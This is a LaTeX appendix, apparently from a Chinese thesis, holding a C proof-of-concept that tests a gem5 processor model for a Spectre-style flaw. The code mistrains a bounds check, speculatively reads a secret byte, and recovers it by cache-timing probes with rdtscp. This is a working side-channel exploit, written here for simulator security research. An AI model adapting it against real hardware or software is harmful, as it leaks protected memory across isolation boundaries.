1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
|
% Copyright (c) 2014,2016 Casper Ti. Vector
% Public domain.
\chapter{附件}
\section{在 gem5 中验证处理器模型安全性的代码}\label{lst:poc_for_gem5}
\begin{minted}{C}
#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <x86intrin.h>
/* default: 64B line size, L1-D 64KB assoc 2, L1-I 32KB assoc 2, L2 2MB assoc 8 */
#define LLC_SIZE (2 << 20)
uint8_t dummy[LLC_SIZE];
size_t array_size = 4;
uint8_t array1[200] = {1, 2, 3, 4};
uint8_t array2[256 * 64 * 2];
uint8_t X;
uint8_t array3[4096];
uint8_t tmp;
uint8_t victim(size_t idx)
{
if (idx < array_size) {
return array2[array1[idx] * 64];
}
return 0;
}
int main()
{
unsigned long t[256];
volatile uint8_t x;
victim(0);
victim(0);
victim(0);
victim(0);
victim(0);
memset(dummy, 1, sizeof(dummy)); // flush L2
X = 123; // set the secret value, and also bring it to cache
_mm_mfence();
size_t attack_idx = &X - array1;
victim(attack_idx);
for (int i = 0; i < 256; i++) {
unsigned int junk;
unsigned long time1 = __rdtscp(&junk);
x ^= array2[i * 64];
unsigned long time2 = __rdtscp(&junk);
t[i] = time2 - time1;
}
printf("attack_idx = %ld\n", attack_idx);
for (int i = 0; i < 256; i++) {
printf("%d: %d, %s\n", i, t[i], (t[i] < 40)? "hit": "miss");
}
}
\end{minted}
|